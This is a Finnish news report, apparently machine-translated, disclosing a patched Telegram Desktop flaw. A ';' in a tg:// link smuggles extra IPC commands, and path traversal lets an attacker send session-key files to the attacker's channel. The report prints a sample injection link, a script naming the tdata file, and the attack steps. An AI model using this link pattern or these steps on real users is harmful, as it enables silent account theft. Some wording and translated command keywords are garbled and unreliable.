Telegram Desktopin, Telegramin virallisen työpöytäsovelluksen, haavoittuvuuden (CVE-2026-107181) yksityiskohdat ja hyväksikäyttötavat on paljastettu. Ongelman aiheuttaa IPC-komennoissa käytettävien erotinmerkkien virheellinen käsittely. Tämä mahdollisti jaetun linkin napsauttamisen siirtää tiedostoja uhrin järjestelmästä hyökkääjälle, mukaan lukien tiedostoja, jotka sisälsivät istuntoavaimia, joita voitiin käyttää Telegram-tilin kaappaamiseen. Haavoittuvuus on korjattu Telegram Desktop 7.2.9:ssä.
Kun napsautetaan "tg://"-linkkejä, käyttöjärjestelmä käynnistää tähän linkkityyppiin liittyvän Telegram Desktop -sovelluksen. Jos järjestelmässä on jo käynnissä toinen tämän sovelluksen esiintymä, käynnissä oleva prosessi välittää linkin sille soketin kautta IPC-rajapinnan avulla. Ongelmana on, että jos sisällytät ";"-merkin linkkiparametreihin (esimerkiksi "tg://x?a=1;OPEN…"), sisältö jaetaan ja ";"-merkkiä seuraavat osat käsitellään erillisinä komentoina.
Hyökkäys käyttää OPEN-komentoa yhdessä "interpret:" URI-skeeman kanssa, joka on suunniteltu käynnistämään palveluskriptejä IPC:n kautta. Näitä käytetään uusien julkaisujen automaattiseen lähettämiseen kanaville. Skripti on ennalta määritetty paikallinen tiedosto, joka määrittää kanavalle lähetettävän tiedoston ja kanavan tunnuksen. Skriptien tiedostopolku käsitellään suhteessa palveluhakemistoon, mutta koska tiedostopoluissa ei ole "../"-osoitusta, hyökkääjä voi käyttää perushakemiston ulkopuolella tallennettuja tiedostoja. He voivat esimerkiksi ladata tiedoston Telegram-ryhmään ja viitata siihen skriptinä luomalla linkin seuraavasti:
tg://x?a=1;AVAA:tulkitse:../../../Lataukset/Telegram%20Desktop/ohjeet.txt
Hyökkäyksen vaiheet:
- Hyökkääjä lisää uhrin ryhmäänsä (oletusasetuksilla uhrin lisääminen ei vaadi lisättävän henkilön vahvistusta) ja lähettää ryhmälle tekstitiedoston, joka sisältää kanavan ja skriptin polun. Telegram tallentaa tämän tiedoston ennalta määriteltyyn järjestelmän alihakemistoon, kun uhri liittyy ryhmään.
kanava: 2005234537
file: tdata/D877F783D5D3EF8Cs - Hyökkääjä lähettää uhrille viattoman näköisen linkin isäntäänsä (esim. "https://coolsite.org"), joka uudelleenohjauksen kautta avattaessa palvelin Hyökkääjän URI korvataan muotoa 'tg://x?a=1;OPEN:interpret:…;OPEN:interpret:…' olevalla URI:lla.
- Kun linkkiä klikataan, selain kutsuu "tg://" URI-käsittelijää, joka käynnistää edellä mainitun komentoketjun suorituksen. Tämän seurauksena tiedostot lähetetään hyökkääjän kanavalle näyttämättä ilmoituksia tai pyytämättä vahvistusta lähetyksestä.
- Saatuaan tdata-alihakemistosta salaus- ja valtuutusavaimia sisältäviä tiedostoja ja käyttäjän asettaman paikallisen salasanan puuttuessa hyökkääjä voi kloonata uhrin yhteyssession tämän laitteelle.
Lähde: opennet.ru
